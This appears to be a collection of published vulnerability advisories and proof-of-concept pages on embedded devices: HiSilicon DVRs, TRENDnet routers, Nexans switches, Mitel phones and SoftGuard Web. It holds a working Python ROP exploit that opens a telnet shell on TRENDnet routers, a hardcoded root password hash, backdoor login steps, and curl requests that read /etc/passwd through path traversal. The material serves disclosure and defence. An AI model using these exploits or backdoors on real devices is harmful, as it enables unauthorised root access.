Xiaongmai AHB7008T-MH-V2, AHB7804R-ELS, AHB7804R-MH-V2, AHB7808R-MS-V2, AHB7808R-MS, AHB7808T-MS-V2, AHB7804R-LMS, HI3518_50H10L_S39 V4.02.R11.7601.Nat.Onvif.20170420, V4.02.R11.Nat.Onvif.20160422, V4.02.R11.7601.Nat.Onvif.20170424, V4.02.R11.Nat.Onvif.20170327, V4.02.R11.Nat.Onvif.20161205, V4.02.R11.Nat.20170301, V4.02.R12.Nat.OnvifS.20170727 is affected by a backdoor in the macGuarder and dvrHelper binaries of DVR/NVR/IP camera firmware due to static root account credentials in the system.

master

Switch branches/tags

**1** branch **0** tags

Code

**Latest commit**

Snawoot update readme

82b0a92

Aug 9, 2020

update readme

82b0a92

**Git stats**

*   **4** commits

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

.gitignore

update gitignore

Feb 4, 2020

LICENSE

Initial commit

Feb 4, 2020

Makefile

upload

Feb 4, 2020

README.md

update readme

Aug 9, 2020

hs-dvr-telnet.c

upload

Feb 4, 2020

**README.md**

**hisilicon-dvr-telnet**

PoC materials for article https://habr.com/en/post/486856/

❤️ ❤️ ❤️

You can say thanks to the author by donations to these wallets:

*   ETH: 0xB71250010e8beC90C5f9ddF408251eBA9dD7320e
*   BTC:
    *   Legacy: 1N89PRvG1CSsUk9sxKwBwudN6TjTPQ1N8a
    *   Segwit: bc1qc0hcyxc000qf0ketv4r44ld7dlgmmu73rtlntw

CVE-2021-41506: GitHub - Snawoot/hisilicon-dvr-telnet: PoC materials for article https://habr.com/en/post/486856/

TRENDnet Wi-Fi routers TEW751DR v1.03 and TEW-752DRU v1.03 were discovered to contain a stack overflow via the function genacgi_main.

Vendor of the products:TRENDnet

Reported by: 　　　WangJincheng && FeiXincheng from X1cT34m

Affected products: TRENDnet TEW751DR <= v1.03 , TRENDnet TEW-752DRU <= v1.03

Vendor Homepage: https://www.trendnet.com/

Vendor Advisory: https://www.trendnet.com/support/support-detail.asp?prod=165\_TEW-751DR , https://www.trendnet.com/support/support-detail.asp?prod=170\_TEW-752DRU

**summarize**

The LAN-side Web-Configuration Interface has Stack-based Buffer Overflow vulnerability in the TrendNet Wi-Fi router firmware TEW751DR TEW-752DRU . In the genacgi_main function of the cgibin program, the sprintf method directly uses the service parameter from /gena.cgi. The attackers can construct a payload to carry out arbitrary code attacks.

**vulnerability description**

There is a stack overflow vulnerability in the genacgi_main function.

It calls the sub_40EC1C function.

However, in the sub_40EC1C function, it calls the sprintf function from a1 to v23 without any security check, which causes the stack overflow.

**poc**

    # python3
    from pwn import *
    from socket import *
    from os import *
    from time import *
    context(os = 'linux', arch = 'mips')
    
    libc_base = 0x2aaf8000
    
    s = socket(AF_INET, SOCK_STREAM)
    
    cmd = b'telnetd -p 7777;'
    payload = b'a'*462
    payload += p32(libc_base + 0x53200 - 1) # s0  system_addr - 1
    payload += p32(libc_base + 0x169C4) # s1  addiu $s2, $sp, 0x18 (=> jalr $s0)
    payload += b'a'*4 # s2
    payload += p32(libc_base + 0x32A98) # ra  addiu $s0, 1 (=> jalr $s1)
    payload += b'a'*0x18 # padding
    payload += cmd
    
    msg = b"UNSUBSCRIBE /gena.cgi?service=" + payload + b" HTTP/1.1\r\n"
    msg += b"Host: localhost:49152\r\n"
    msg += b"SID: 1\r\n\r\n"
    
    s.connect((gethostbyname("192.168.10.1"), 49152))
    s.send(msg)
    	
    sleep(1)
    system("telnet 192.168.10.1 7777")

CVE-2022-33007: CVE/bufferoverflow.md at main · fxc233/CVE

Nexans FTTO GigaSwitch industrial/office switches HW version 5 suffer from having a hardcoded backdoor user and multiple outdated vulnerable software components.

SEC Consult Vulnerability Lab Security Advisory < 20220615-0 >  
=======================================================================  
               title: Hardcoded Backdoor User and Outdated Software Components  
             product: Nexans FTTO GigaSwitch industrial/office switches HW version 5  
  vulnerable version: See "Vulnerable / tested versions"  
       fixed version: V6.02N, V7.02  
          CVE number: CVE-2022-32985  
              impact: High  
            homepage: https://www.nexans.com/  
               found: 2020-05-25  
                  by: T. Weber (Office Vienna)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"As a global player in the cable industry, Nexans is behind the scenes  
delivering the innovative services and resilient products that carry thousands  
of watts of energy and terabytes of data per second around the world. Millions  
of homes, cities, businesses are powered every day by Nexans’ high-quality  
sustainable cabling solutions. We help our customers meet the challenges they  
face in the fields of energy infrastructure, energy resources, transport,  
buildings, telecom and data, providing them with solutions and services for the  
most complex cable applications in the most demanding environments."

Source: https://www.nexans.com/company/What-we-do.html

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

SEC Consult recommends to perform a thorough security review of these  
products conducted by security professionals to identify and resolve all  
security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Outdated Vulnerable Software Components  
A static scan with the IoT Inspector (ONEKEY) revealed outdated software packages that  
are used in the devices' firmware. Four of them were verified by using the  
MEDUSA scalable firmware runtime.

2) Hardcoded Backdoor User (CVE-2022-32985)  
A hardcoded root user was found in "/etc/passwd". In combination with the  
invoked dropbear SSH daemon in the libnx_apl.so library, it can be used on port  
50201 and 50200 to login on a system shell.

Proof of concept:  
-----------------  
1) Outdated Vulnerable Software Components  
Based on an automated scan with the IoT Inspector (ONEKEY) the following third party  
software packages were found to be outdated:

Firmware version 6.02L:  
BusyBox       1.20.2  
Dropbear SSH  2012.55  
GNU glibc     2.17  
lighttpd      1.4.48  
OpenSSL       1.0.2h

The following CVEs were verified with MEDUSA scalable firmware emulation:

* CVE-2015-9261 (Unzip)  
The crafted ZIP archive "x_6170921383890712452.bin" was taken from:  
https://www.openwall.com/lists/oss-security/2015/10/25/3  
Execution inside the firmware emulation:

bash-4.2# unzip x_6170921383890712452.bin  
Archive:  x_6170921383890712452.bin  
   inflating: ]3j½r«IK-%Ix  
do_page_fault(): sending SIGSEGV to unzip for invalid read access from 735ededc  
epc = 0044bb28 in busybox[400000+99000]  
ra  = 0044b968 in busybox[400000+99000]  
Segmentation fault

* CVE-2015-0235 (gethostbyname "GHOST" buffer overflow)

PoC code was taken from:  
https://gist.github.com/dweinstein/66e6a088191ac0e8105c

* CVE-2015-7547 (getaddrinfo buffer overflow)

PoC code was taken from:  
https://github.com/fjserna/CVE-2015-7547

-bash-4.4# python /medusa_exploits/cve-2015-7547-poc.py &  
[1] 259  
-bash-4.4# chroot /medusa_rootfs/ bin/bash  
bash-4.2# cd /medusa_exploits/  
bash-4.2# ./cve-2015-7547_glibc_getaddrinfo  
[UDP] Total Data len recv 36  
[UDP] Total Data len recv 36  
Connected with 127.0.0.1:34356  
[TCP] Total Data len recv 76  
[TCP] Request1 len recv 36  
[TCP] Request2 len recv 36  
Segmentation fault

* CVE-2017-16544 (shell autocompletion vulnerability)

A file with the name "\ectest\n\e]55;test.txt\a" was created to trigger the  
vulnerability.  
-------------------------------------------------------------------------------  
# ls "pressing <TAB>"  
test  
]55;test.txt  
#  
-------------------------------------------------------------------------------

2) Hardcoded Backdoor User (CVE-2022-32985)  
The hardcoded system user, reachable via the dropbear SSH daemon was found due  
to multiple indications on the system. The undocumented root user itself was  
contained in the "passwd" file:

Content of the file "/etc/passwd".  
-------------------------------------------------------------------------------  
root:oFQzvQf5qrI56:0:0:root:/home/root:/bin/sh  
[...]  
-------------------------------------------------------------------------------

A suspicious port for the SSH daemon was chosen in the config file of dropbear:

Content of the file "/etc/init.d/dropbear":  
-------------------------------------------------------------------------------  
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin  
DAEMON=/usr/sbin/dropbear  
NAME=dropbear  
DESC="Dropbear SSH server"  
PIDFILE=/var/run/dropbear.pid

DROPBEAR_PORT="50200 -p 50201"  
[...]  
-------------------------------------------------------------------------------

This is invoked from "/usr/lib/libnx_apl.so.0.0.0", which can be seen in the  
following pseudo-code:  
-------------------------------------------------------------------------------  
void dropbear_server_init(char param_1)

{  
   __pid_t __pid;  
   char *pcVar1;  
   int aiStack16 [2];

   __pid = fork();  
   if (__pid == 0) {  
     __pid = fork();  
     if (__pid != 0) {  
                     /* WARNING: Subroutine does not return */  
       exit(0);  
     }  
     if (param_1 == '\0') {  
       pcVar1 = "/etc/init.d/dropbear stop";  
     }  
     else {  
       pcVar1 = "/etc/init.d/dropbear start";                               <---  
     }  
     execl("/bin/sh","sh",&DAT_2cd91564,pcVar1,0);  
   }  
   else {  
     waitpid(__pid,aiStack16,0);  
   }  
   return;  
}  
-------------------------------------------------------------------------------

This function is called if a specific command is issued in the CLI interface:  
-------------------------------------------------------------------------------  
[...]  
   iVar6 = telnet_cmp_command((char *)(param_3 + 0xf2),"ssh",2);  
   if (iVar6 != 0) {  
     if (param_2 < 4) {  
       netbuf_fwd_sprintf(param_1,"\r\n%%Error: Parameter missing\r\n");  
       iVar6 = shared_mem_get_addr(&var_shm);  
       iVar7 = shared_mem_get_addr(&var_shm);  
       uVar8 = shared_mem_read_u8(&var_shm,iVar7 + 0x161a);  
       shared_mem_write_u8(&var_shm,iVar6 + 0x161a,uVar8 & 0xff | 0x10);  
       return;  
     }  
     iVar6 = telnet_cmp_command((char *)(param_3 + 0x16b),"start",1);  
     if (iVar6 != 0) {  
       dropbear_server_init('\x01');                                        <---  
       netbuf_fwd_sprintf(param_1,"Starting dropbear...\r\n");  
       return;  
     }  
     iVar6 = telnet_cmp_command((char *)(param_3 + 0x16b),"stop",1);  
     if (iVar6 != 0) {  
       dropbear_server_init('\0');                                          <---  
       netbuf_fwd_sprintf(param_1,"Stopping dropbear...\r\n");  
       return;  
     }  
     netbuf_fwd_sprintf(param_1,"Uknown dropbear command...\r\n");  
     return;  
[...]  
-------------------------------------------------------------------------------  
The mentioned library is used in the CLI program that is running on the device.

Vulnerable / tested versions:  
-----------------------------  
The following firmware versions have been tested:

* Nexans FTTO GigaSwitch HW Version 5 (all industrial/office switches) / Firmware 6.02L  
* Nexans FTTO GigaSwitch HW Version 5 (all industrial/office switches) / Firmware 5.04M

Vendor contact timeline:  
------------------------  
2020-05-28: Contacting the vendor's PSIRT under the following link:  
             http://www.nexans-ans.de/support/index.php?u=security_portal_sendmail  
      No answer.  
2020-06-08: Contacting vendor again via support.ans@nexans.com. Extended  
             deadline by 11 days.  
2020-06-16: Telephone call with Nexans representative. Security advisory was  
             received. It will be reviewed to confirm the found issues.  
2020-06-26: Telephone call with Nexans representative. Nexans is working on the  
             reported issues and will remove the dropbear daemon as first  
             measure.  
2020-08-04: Vendor stated that a fix for the outdated software components will  
             be available in November.  
2020-11-12: Asked for status update.  
2020-11-16: Contact stated, that firmware test will need more time. Updates are  
             estimated to be ready in Q1 of 2020.  
2020-11-20: Vendor confirmed Q1 as estimated disclosure date.  
2021-01-21: Asked for status update; Vendor stated that the release with all  
             fixes is aimed to be published end of Q1.  
2021-03-09: Asked for status update.  
2021-03-17: Vendor stated that the firmware is in testing stage. The fixed  
             firmware will be released in May.  
2021-06-10: Asked for status update.  
2021-06-14: Vendor stated that the firmware is not ready due to COVID19 and  
             homeschooling. The fixed firmware will be released end of August.  
2021-08-31: Asked for status update.  
2021-09-07: Vendor stated that the fixed firmware will be ready end of 2021.  
2022-05-23: Informed vendor that the advisory will be released mid of June 2022.  
2022-05-24: Firmware V7.02 is available for download which fixes most outdated  
             components issues.  
2022-06-15: Release of security advisory.

Solution:  
---------  
The vendor provides an updated firmware here:  
https://www.nexans-ans.de/support/firmware/

Firmware version V6.02N has the backdoor removed and was already published a while ago.  
Version V7.02 also has the backdoor removed and most of the outdated software issues.

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF T. Weber / @2022

Nexans FTTO GigaSwitch Outdated Components / Hardcoded Backdoor

Mitel 6800/6900 Series SIP Phones excluding 6970 and Mitel 6900 Series IP (MiNet) Phones have a flow to spawn a telnet backdoor on the device with a static root password enabled. Affected versions include Rel 5.1 SP8 (5.1.0.8016) and earlier, Rel 6.0 (6.0.0.368) to 6.1 HF4 (6.1.0.165), and MiNet 1.8.0.12 and earlier.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Advisory ID:               SYSS-2022-021  
Product:                   Mitel 6800/6900 Series SIP Phones excluding 6970  
                            Mitel 6900 Series IP (MiNet) Phones  
Manufacturer:              Mitel Networks Corporation  
Affected Version(s):       Rel 5.1 SP8 (5.1.0.8016) and earlier  
                            Rel 6.0 (6.0.0.368) to 6.1 HF4 (6.1.0.165)  
                            MiNet 1.8.0.12 and earlier  
Tested Version(s):         6.1.0.146  
Vulnerability Type:        Hidden Functionality (Backdoor) (CWE-912)  
Risk Level:                High  
Solution Status:           Fixed  
Manufacturer Notification: 2022-02-23  
Solution Date:             2022-05-03  
Public Disclosure:         2022-06-10  
CVE Reference:             CVE-2022-29854  
                            CVE-2022-29855  
Author of Advisory:        Moritz Abrell, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Mitel Networks Corporation manufactures different IP- and SIP-based  
desk phones.

The manufacturer describes these products, e.g., as follows:

"The 6900 IP Series is a powerful suite of desk phones with crystal clear  
audio, advanced features and a broad array of accessories to improve  
productivity and mobility in today's modern business environment."

The firmware of several phones contains an undocumented backdoor which  
allows an attacker to gain root access by pressing specific keys on  
system boot.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The shell script "check_mft.sh", which is located in the directory  
"/etc" on the phone, checks whether the keys "*" and "#" are pressed  
simultaneously during system startup.

The phone then sets its IP address to "10.30.102.102" and starts a  
Telnet server. A Telnet login can then be performed with a static root  
password.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

1. Identify the backdoor

1.1. Extract the jffs2 file system from an affected Mitel firmware:

#> binwalk -e 6867i.st

DECIMAL       HEXADECIMAL     DESCRIPTION  
- --------------------------------------------------------------------------------  
347           0x15B           Linux kernel ARM boot executable zImage (little-endian)  
15695         0x3D4F          gzip compressed data, maximum compression, from Unix, last modified: 2021-10-22 10:47:08  
1223395       0x12AAE3        JFFS2 filesystem, little endian

1.2. Mount the jffs2 file system:

#> modprobe jffs2  
#> modprobe mtdram total_size=70000  
#> modprobe mtdblock  
#> dd if=12AAE3.jffs2 of=/dev/mtdblock0  
#> mount -t jffs2 /dev/mtdblock0 /mnt/

1.3. The script "check_mft.sh" located in the "/etc" directory contains  
the backdoor logic:

#> cat /mnt/etc/check_mft.sh  
************* content shortened ****************  
#!/bin/sh

case "$HOSTNAME" in

#press and hold *  # two keys at the same time

           "bcm911109_6867i" | "6867i" | "bcm911107_praxis_3" |  "bcm911109_aquarius_3")  
         GPIODetect=`gpio get 4`  
         checkDhsgShorted  
         #KEY_OUT0 (GPIO52)  -> KEY_IN7 (GPIO50)  "DownKey" is press  
         isCCATest=`dbg rw 0x8000d000 8| grep "0x8000d000: 01ff 017f 01ff 01ff 01ff 01ff 01ff 01ff"`

                  keyBoardScanMatch="True"  
         keycombinationMatch=`dbg rw 0x8000d000 8| grep "0x8000d000: 01ff 01ff 01ff 01ff 01af 01ff 01ff 01ff"`  
     ;;  
esac

echo "keyBoardScanMatch = $keyBoardScanMatch,  dhsgShorted=$dhsgShorted "  
echo "GPIODetect = $GPIODetect,keycombinationMatch=$keycombinationMatch"  
echo "isCCATest = $isCCATest"

if [ "$keyBoardScanMatch" -a $dhsgShorted -eq 1 -a $GPIODetect -eq "0" -o  "$keycombinationMatch" ]; then  
     mount -t jffs2 /dev/mtdblock3 /nvdata  
     if [ -f $ENETCFG ]; then  
         . $ENETCFG  
         MAC=${ENETCFG_MAC}  
     fi

     /etc/if_bcm_net_setup.sh up  
     ifconfig eth0 hw ether $MAC  
     ifconfig eth0 10.30.102.102 netmask 255.255.255.0 up

          if [ -f /usr/sbin/telnetd ]; then  
          telnetd &  
     fi  
     exit 255  
fi  
************* content shortened ****************

1.4. The file "ota_BCM911109_PRAXIS_3_voice_v6_5_jffs2.bin" located in  
the directory "/etc" contains another jffs2 file system.

1.5. Extract and mount the file system as described in Steps 1  
and 2.

1.6. The "check_mft.sh" in this file system also contains the root  
password which is set by default and forced by the script:

#> cat /mnt/etc/check_mft.sh  
************* content shortened ****************  
if [ -f /usr/sbin/telnetd ]; then  
# make sure the default password is set for root.  
     (echo (password stripped out); sleep 1; echo (password stripped out) | passwd -a A  
     telnetd &  
fi  
************* content shortened ****************

2. Exploiting

2.1. Boot the phone and press the "*" and "#" keys simultaneously.

2.2. Assign an IP address to communicate with the phone:

#> ip addr add 10.30.102.100/24 dev eth0

2.3. Now, logging in to the phone as the root user with the static password  
via Telnet is possible:

#> telnet 10.30.102.102  
Trying 10.30.102.102...  
Connected to 10.30.102.102.  
Escape character is '^]'.

(none) login: root  
Password:  
10.30.102.102 # id  
uid=0(root) gid=0(root) groups=0(root)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Upgrade to one of the following (or later) versions:  
- - 5.1 SP8 HF1 (5.1.0.8017)  
- - 6.1 HF5 (6.1.0.171)  
- - 6.2 SP1 (6.2.0.1012)  
- - MiNet 1.8.0.15

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2022-02-22: Vulnerability discovered  
2022-02-23: Vulnerability reported to manufacturer  
2022-02-24: Acknowledgement of receipt of the vulnerability report  
             received from the manufacturer  
2022-03-30: Consultation with the manufacturer regarding updates to fix  
             the vulnerability  
2022-03-30: Manufacturer confirms the vulnerability, informs about the  
             status to fix the vulnerability and asks for an extension of  
             the disclosure timeline  
2022-03-31: New disclosure date set to 2022-05-10  
2022-05-04: Asking the manufacturer for any updates regarding the  
             vulnerability  
2022-05-05: Manufacturer provides a patch to fix this vulnerability  
2022-05-05: Manufacturer publishes the vulnerability and assigned CVE IDs  
2022-05-05: Manufacturer asks for another extension of the disclosure  
             timeline, as large parts of the phones may still be unpatched  
             in practice  
2022-05-05: New disclosure date set to 2022-06-10  
2022-06-10: Public disclosure of the vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Mitel IP desk phones:  
     https://www.mitel.com/products/devices-accessories/ip-phones-peripherals  
[2] SySS Responsible Disclosure Policy:  
     https://www.syss.de/en/responsible-disclosure-policy  
[3] Vulnerability reports by the manufacturer:  
     https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-22-0004  
     https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-22-0003  
[4] CVE-2022-29854:  
     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29854  
[5] CVE-2022-29855:  
     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29855

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail:moritz.abrell@syss.de  
Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc  
Key Fingerprint: 2927 7EB6 1A20 0679 79E9  87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmKaIVcACgkQrgyb+PE0  
i1O5fA/9H7onaudE9cqHwqBf0cjdXczlo2e52XXIvcX7NdxQ7HAPuo3kXAeHQCg4  
0IlP2MB8rTBLtEJf43ZJhqDuK2J+Q6ypsVrmAzvCBYswsJjFH2SKYkS9cIx3CSaw  
35G+J578oYQMex0fZJGK3vYGBPtTIoXhW3Gb4rdG41o6lhKQ3ELF04/9CQTUpKao  
llCYe3zOhmacnpJ93w5aCenEPqJnrOy0w1bguQN6j43cEnGyv7hVIwW4ukQ4yTvz  
iBjoRBx89VdjEQKb7g52D6pnORT48vgkDNXZcowofKtD1LZxPz6fC+cuBabSJz41  
MFObTqfW9tYTVsBAuqIlQWavp3sy1Jenh/wb9gHILVXupv5flux2ffuKZPyDg6dq  
dh66GXJaXEX0cWuUax8z6nj6l0nWOcjmbo07Ad1rox8bSOffSvtNRxEgij8tjwPg  
UpWD6sofHid9BhGWJpyziBRvADDYSakohHZA+GCNONopVwhJdE+RrfOWaD1HV7jn  
V+RI1ZmB1MYSDHKK11sfYpIFn1qdvF3l0hM0YVjxcy2iNn/cR9ZnId0wtRK4mVhx  
wx5XBltwHMBREPgNUnqAmsAuAOitt7+vHdVpWA0/0A1vjJnFfdDy2rSiNoDRysrE  
jp76E0iYjNPWdtJE67Q449Vwk6RINH7C+sSMbAQq5WfY336TyNQ=  
=jFCk  
-----END PGP SIGNATURE-----

Mitel 6800/6900 Series SIP Phones Backdoor Access

SoftGuard Web (SGW) versions prior to 5.1.5 suffer from html injection and arbitrary file system access allow for file downloads.

SEC Consult Vulnerability Lab Security Advisory < 20220609-0 >  
=======================================================================  
               title: Multiple vulnerabilities  
             product: SoftGuard SNMP Network Management Extension  
  vulnerable version: SoftGuard Web (SGW) < 5.1.5  
       fixed version: SoftGuard version 5.1.5 from 2022-06-01  
          CVE number: CVE-2022-31201, CVE-2022-31202  
              impact: High  
            homepage: https://gravitate.eu (reseller)  
               found: 2022-04-14  
                  by: Philipp Espernberger (Office Linz)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
There is no public description available for this vendor/product. The following  
description was provided as documentation:

"SoftGuard is a network management extension which collects inventory-, analysis-  
and debugging data of devices and networks at least once a day. SoftGuard has an  
open structure, is built simple, is easily expandable, easy to use and is laid out  
for large scale networks. The data collection is performed with the protocols SNMP  
supporting the versions 1, 2c and 3. Additional protocols like ssh, telnet, rsh,  
https, NetBIOS/IP, ICMP ... complemented by SNMP if required.

The SoftGuard Suite consists of three parts:

* SoftGuard Network Center (SNC)  
* SoftGuard Host Center (SHC)  
* SoftGuard Monitor Center (SMC)

Aditionally there are a bunch of common and customer specific expansions like  
SoftGuard Web (SGW), SoftGuard Statistic Tool (SST), Port Configuration Tool (PCT),  
Network Access Points (NAP), Technician Access Point (TAP), etc."

Business recommendation:  
------------------------  
SEC Consult recommends to update to the latest version of SoftGuard (network management  
extension).

An in-depth security analysis performed by security professionals is highly  
advised, to identify and resolve potential further critical security issues.

Vulnerability overview/description:  
-----------------------------------  
1) File System Access (CVE-2022-31202)  
The export function allows authenticated attackers to download any  
arbitrary local file from the file system due to insufficient input  
validation. The unfiltered URL parameter query enables an attacker to  
access arbitrary local files. This allows the attacker to define the  
complete path and the filename by himself. Files that include passwords  
and other sensitive information can be accessed.  
Furthermore, the built-in man functionality also allows attackers to  
read any arbitrary local file from the file system.

2) HTML Injection (CVE-2022-31201)  
Various components do not properly sanitize/encode user input. This  
leads to HTML injection vulnerabilities. By exploiting this vulnerability,  
an attacker can include arbitrary HTML into the affected web page. The  
code is executed in the context of the victim's browser when visiting  
the manipulated URL. The vulnerability can be used to change the contents  
of the displayed site or redirect to other sites.

During the security assessment it was not possible to execute JavaScript  
code because the security headers Content-Security-Policy and  
X-Content-Type-Options are preventing the execution.

Proof of concept:  
-----------------  
1) File System Access (CVE-2022-31202)  
1a) Export functionality  
In order to access arbitrary local files, the export function as authenticated  
user (Administration -> User -> Access -> Export) can be used. The following URL  
was used to set the filename to /etc/passwd  
===============================================================================  
https://$host:8016/sgw/export?dbs=file&db=DefUser_access_$username_db%2e  
1649426888398872%2etmp&query=file%3a/etc/passwd'

===============================================================================

The newly set filename (/etc/passwd) can be exported and downloaded via the  
execution button. Afterwards the content of the file gets downloaded successfully.  
===============================================================================  
root:x:0:0:root:/root:/bin/bash  
bin:x:1:1:bin:/bin:/sbin/nologin  
daemon:x:2:2:daemon:/sbin:/sbin/nologin  
adm:x:3:4:adm:/var/adm:/sbin/nologin  
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin  
sync:x:5:0:sync:/sbin:/bin/sync  
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin  
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin  
nobody:x:99:99:Nobody:/:/sbin/nologin  
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin  
dbus:x:81:81:System message bus:/:/sbin/nologin  
[...]  
===============================================================================

1b) MAN functionality  
The following curl command shows how an authenticated attacker can gain access  
to any arbitrary local file:  
===============================================================================  
curl 'https://$host:8016/cgi-bin/man.tcl' -H 'Authorization: Basic [...]'  
--data 'act=1&x=%2Fetc%2Fpasswd&submit=Execute' --compressed --insecure

===============================================================================

The curl response includes the contents of the file:  
===============================================================================  
<!DOCTYPE html>  
<html lang="en"><head><meta charset="UTF-8" />  
[...]  
<pre>  
root:x:0:0:root:/root:/bin/bash  
bin:x:1:1:bin:/bin:/sbin/nologin  
daemon:x:2:2:daemon:/sbin:/sbin/nologin  
adm:x:3:4:adm:/var/adm:/sbin/nologin  
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin  
sync:x:5:0:sync:/sbin:/bin/sync  
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin  
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin  
nobody:x:99:99:Nobody:/:/sbin/nologin  
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin  
dbus:x:81:81:System message bus:/:/sbin/nologin  
[...]  
===============================================================================

2) HTML Injection (CVE-2022-31201)  
When a new graph is created an authenticated attacker controls the GET parameters  
and can inject malicious content. The following curl command shows how an  
authenticated attacker can inject HTML code:  
===============================================================================  
curl 'https://$host:8016/sgw/graph?tbl=sgNode&t=percent&h=Status%3Ch1%3ESEC-  
Consult%3C/h1%3E+%23&v=%7bdown+1934+orange%7d+%7bicmp+555+red%7d+%7bsnmpaaaa+8723+green%7d&scale=5'  
-H 'Authorization: Basic [...]' --compressed --insecure

===============================================================================

The curl response includes the injected HTML code <h1>SEC Consult</h1>:  
===============================================================================  
<!DOCTYPE html>  
<html lang="en">  
<head>  
  <meta charset="UTF-8"/>  
  <title>SGW - Graph: Node</title>  
[...]  
</head>  
<body class="master">  
  [...]  
  <caption>∑3, Status<h1>SEC Consult</h1>, #11212</caption>  
  [...]  
  <tr><td>Status<h1>SEC Consult</h1></td>  
[...]  
</body></html>  
===============================================================================

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested and found to be vulnerable:  
* SoftGuard Web (SGW) 5.1.3

The vendor provided the following information regarding the affected versions:

1a) affected version 4.5.0 (2019-05-04) to version 4.5.8 (2020-05-05)  
1b) since SoftGuard 2.0 with SoftGuard Web 1.0 (~1998/99)  
2)  since SoftGuard 3.6.0 (2009-10-31) / SoftGuard 3.6.6 (2011-02-15) with  
     SoftGuard Web 2.6.0/2.6.6

Vendor contact timeline:  
------------------------  
2022-05-11: Contacting vendor through direct email address.  
2022-05-11: Sent encrypted security advisory to vendor  
2022-05-12: Received feedback from the vendor for the security advisory  
2022-05-16: Received confirmation that a new version of SoftGuard was  
             already rolled out to the customers which included the fix  
2022-05-16: Received additional information which versions are vulnerable  
2022-05-19: Received CVE numbers.  
2022-05-20: Reviewed the fixed version 5.1.4 and found that HTML injection  
             still works at other endpoints, other issues are fixed.  
2022-05-20: Vendor replies that new version 5.1.5. will be released on 1st June.  
2022-06-01: Vendor releases patched version 5.1.5.  
2022-06-09: Coordinated release of security advisory.

Solution:  
---------  
The vendor rolled out new software versions. Affected users should verify that  
they are using the latest version available (5.1.5 from 2022-06-01 or higher).

